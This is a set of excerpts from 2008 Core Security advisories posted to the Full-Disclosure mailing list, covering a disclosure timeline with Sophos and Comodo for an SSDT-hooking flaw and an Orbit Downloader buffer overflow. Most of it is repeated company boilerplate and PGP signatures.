with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIH0wJyNibggitWa0RAvx7AJ9F2ULHzdfuAmpGehbUniMOUH/+qQCfaggu kCJMZJzA/vvM7nMEsuDjW5c= =AmKo -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0320 - Insufficient argument validation of hooked SSDT functions on multiple Antivirus and Firewalls
for all of Sophos Windows customers. Sophos would like to fix the bug in the next major version (second quarter 2009), in particular considering the fact that they were unable to come up with any practical use of this vulnerability. . 2008-04-14: Comodo notifies Core that a fix has been produced. . 2008-04-14: Sophos informs Core that they will be able to release a fix to the vulnerability at the end of October 2008. . 2008-04-21: Core responds that they will reschedule the publication to April 24th, 2008. Since the vulnerability is not critical, and has been found using publicly available tools, like the other vulnerabilities included in the advisory, Core doesn't see a reason to postpone the publication of the Sophos bug until October 2008. . 2008-04-21: Sophos asks Core not to release details of the vulnerability until a fix is available, and not to publish Proof of Concept code. Sophos informs that they do not believe that arbitrary code execution is possible. . 2008-04-24: Core responds that the advisory does not contain Proof of Concept code. Core confirms its intention of publishing the advisory, including the technical description, but decides to postpone it to April 28th, to give the participants more time to coordinate the release of public information. . 2008-04-25: Sophos provides additional information, included in the vendor information section of the advisory. . 2008-04-28: CORE-2008-0320 advisory is published. *References* [1] http://www.bitdefender.com [2] http://www.comodo.com [3] http://www.sophos.com [4] http://www.rising-global.com [5] http://www.matousec.com/downloads [6] http://www.matousec.com/info/articles/plague-in-security-software-drivers.php *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIFj4WyNibggitWa0RAkUcAJ9yUGXQQV5ZQ1J0R2U+MSTMRuHa4wCgkXh1 UGe5qGGTXrCSFfFX3JH6ovE= =3mt3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CORE-2008-0314 - Orbit Downloader Download failed buffer overflow
notifies Core Security Technologies that a fix has been produced. . 2008-04-03: CORE-2008-0314 advisory is published. *References* [1] http://www.orbitdownloader.com [2] http://msdn2.microsoft.com/en-us/library/ms776413(VS.85).aspx *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFH9UkByNibggitWa0RAuXFAJ4v5Fgp5RNTdK/7uOpzenSArY4jUQCeKV4D 4aeviH5oHhjdIRFmDLVVUx0= =v9yp -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
